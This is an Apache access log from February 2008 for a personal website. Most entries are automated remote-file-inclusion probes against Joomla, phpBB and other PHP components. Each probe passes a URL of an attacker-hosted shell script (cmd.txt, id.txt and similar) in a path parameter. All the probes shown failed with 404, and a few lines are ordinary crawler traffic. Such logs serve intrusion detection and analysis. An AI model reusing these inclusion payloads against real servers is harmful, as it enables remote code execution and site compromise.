77.37.15.210 - - [26/Feb/2008:09:45:36 -0800] "GET /components/com_search/search.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.37.15.210 - - [26/Feb/2008:09:45:36 -0800] "GET /logs/components/com_search/search.html.php?mosConfig_absolute_path=http://www.abi-ergo-sum.de/cms/components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
195.234.108.168 - - [26/Feb/2008:09:45:50 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:09:45:53 -0800] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://sierra-hulinggi.com/alat/idscan2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.199.215.57 - - [26/Feb/2008:09:46:21 -0800] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.199.215.57 - - [26/Feb/2008:09:46:22 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.52.143.16 - - [26/Feb/2008:09:46:26 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.16 - - [26/Feb/2008:09:46:28 -0800] "GET /presto/?D=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
200.61.42.46 - - [26/Feb/2008:09:46:41 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.61.42.46 - - [26/Feb/2008:09:46:45 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.61.42.46 - - [26/Feb/2008:09:46:46 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.118.97.161 - - [26/Feb/2008:09:47:56 -0800] "GET /logs/access_080201.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.78 - - [26/Feb/2008:09:48:25 -0800] "GET /bikes/dteel/EQ2/?D=A HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:09:48:45 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:09:48:46 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [26/Feb/2008:09:48:47 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:09:48:48 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [26/Feb/2008:09:48:48 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:09:48:49 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
66.45.242.50 - - [26/Feb/2008:09:49:20 -0800] "GET //functions_user_viewed_posts.php?phpbb_root_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:09:49:22 -0800] "GET /logs//functions_user_viewed_posts.php?phpbb_root_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
218.63.242.108 - - [26/Feb/2008:09:49:45 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://62.75.146.155/~unown/php/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:09:49:45 -0800] "GET /logs/access_080211.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:09:49:46 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:09:49:46 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:09:49:47 -0800] "GET /logs/access_080117.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.241.196.84 - - [26/Feb/2008:09:50:35 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.196.84 - - [26/Feb/2008:09:50:35 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.254.53.145 - - [26/Feb/2008:09:50:43 -0800] "GET /logs/access.log//codebb/pass_code.php?phpbb_root_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.254.53.145 - - [26/Feb/2008:09:50:43 -0800] "GET //codebb/pass_code.php?phpbb_root_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.254.53.145 - - [26/Feb/2008:09:50:43 -0800] "GET /logs//codebb/pass_code.php?phpbb_root_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [26/Feb/2008:09:50:45 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.freewebtown.com/indoirc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.52.9.218 - - [26/Feb/2008:09:50:50 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.freewebtown.com/indoirc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:09:51:17 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:09:51:18 -0800] "GET /logs/access_080108.log/config.inc.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [26/Feb/2008:09:51:18 -0800] "GET /config.inc.php?path_escape=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:09:51:19 -0800] "GET /config.inc.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [26/Feb/2008:09:51:19 -0800] "GET /logs/config.inc.php?path_escape=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:09:51:21 -0800] "GET /logs/config.inc.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
219.166.61.155 - - [26/Feb/2008:09:52:48 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
219.166.61.155 - - [26/Feb/2008:09:52:48 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
81.182.64.47 - - [26/Feb/2008:09:53:20 -0800] "GET /logs/access_080101.log/index.php?redir=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.182.64.47 - - [26/Feb/2008:09:53:43 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.200.219 - - [26/Feb/2008:09:53:55 -0800] "GET /bikes/dteel/2008_02_16/IMG_4543s.JPG HTTP/1.1" 200 196608 "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:09:53:56 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:09:53:56 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:09:53:56 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:09:55:20 -0800] "GET /logs/access_080118.log/components/com_minibb.php?absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:09:55:45 -0800] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:09:55:46 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:09:55:46 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:09:55:48 -0800] "GET /logs/access_080117.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:09:55:49 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:09:55:49 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.55.213.30 - - [26/Feb/2008:09:56:28 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:09:56:28 -0800] "GET /logs/access_080211.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.55.213.30 - - [26/Feb/2008:09:56:32 -0800] "GET /bikes/IMG_1188.jpg HTTP/1.0" 200 2700842 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
209.85.52.146 - - [26/Feb/2008:09:56:45 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.maxima-fm.com.mx/guadalajara/promos/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.213.30 - - [26/Feb/2008:09:57:17 -0800] "GET /bikes/vfr750d.jpg HTTP/1.0" 200 237846 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [26/Feb/2008:09:57:18 -0800] "GET /minamijewelry/dream.psd HTTP/1.0" 200 109304 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
62.193.225.104 - - [26/Feb/2008:09:57:19 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:09:58:21 -0800] "GET /logs/access_080211.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:09:58:21 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:09:58:22 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:09:58:25 -0800] "GET /logs/access.log/index.php?go=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:09:58:25 -0800] "GET /index.php?go=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [26/Feb/2008:09:58:25 -0800] "GET /logs/index.php?go=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:09:59:16 -0800] "GET /logs/access_080117.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.89.97 - - [26/Feb/2008:09:59:40 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
72.29.89.97 - - [26/Feb/2008:09:59:44 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
72.30.216.88 - - [26/Feb/2008:10:00:26 -0800] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:01:17 -0800] "GET /logs/access_080119.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
70.84.141.194 - - [26/Feb/2008:10:01:25 -0800] "GET //index.php?option=com_joomlaxplorer&action=list&dir=development&order=name&srt=yes&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.141.194 - - [26/Feb/2008:10:01:26 -0800] "GET /logs/access_080107.log//index.php?option=com_joomlaxplorer&action=list&dir=development&order=name&srt=yes&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.141.194 - - [26/Feb/2008:10:01:27 -0800] "GET /logs//index.php?option=com_joomlaxplorer&action=list&dir=development&order=name&srt=yes&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.48.162 - - [26/Feb/2008:10:01:32 -0800] "GET //index.php?option=com_zoom&Itemid=33&catid=25&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.141.194 - - [26/Feb/2008:10:01:35 -0800] "GET /logs/access_071220.log//index.php?option=com_joomlaxplorer&action=list&dir=development&order=name&srt=yes&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.48.162 - - [26/Feb/2008:10:01:40 -0800] "GET /logs//index.php?option=com_zoom&Itemid=33&catid=25&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.48.162 - - [26/Feb/2008:10:01:55 -0800] "GET /logs/access.log//index.php?option=com_zoom&Itemid=33&catid=25&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.248.95 - - [26/Feb/2008:10:05:00 -0800] "GET /logs/access.log/components/com_simpleboard/file_upload.php?sbp=http://www.hospdex.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [26/Feb/2008:10:05:05 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.hospdex.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [26/Feb/2008:10:05:06 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.hospdex.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [26/Feb/2008:10:05:36 -0800] "GET /logs/access_080106.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:05:53 -0800] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:05:53 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:05:53 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:10:05:56 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:10:05:56 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:10:05:56 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:10:06:21 -0800] "GET /logs/access_080130.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:07:09 -0800] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:07:10 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:07:10 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.79.163.220 - - [26/Feb/2008:10:08:16 -0800] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [26/Feb/2008:10:08:38 -0800] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
72.29.89.97 - - [26/Feb/2008:10:08:38 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
211.233.7.68 - - [26/Feb/2008:10:09:07 -0800] "GET //modules/myAds/index.php?pa=view&cid=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.233.7.68 - - [26/Feb/2008:10:09:11 -0800] "GET /logs//modules/myAds/index.php?pa=view&cid=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.193.225.104 - - [26/Feb/2008:10:11:13 -0800] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.225.104 - - [26/Feb/2008:10:11:13 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.225.104 - - [26/Feb/2008:10:11:14 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:11:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:11:44 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:11:45 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.108 - - [26/Feb/2008:10:12:19 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.91 - - [26/Feb/2008:10:12:20 -0800] "GET /logs/access_080120.log HTTP/1.0" 200 585838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.13.195.52 - - [26/Feb/2008:10:12:51 -0800] "GET /logs/access_080131.log/index.php?s=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [26/Feb/2008:10:12:51 -0800] "GET /index.php?s=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [26/Feb/2008:10:12:51 -0800] "GET /logs/index.php?s=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:10:13:00 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:10:13:00 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:10:13:00 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
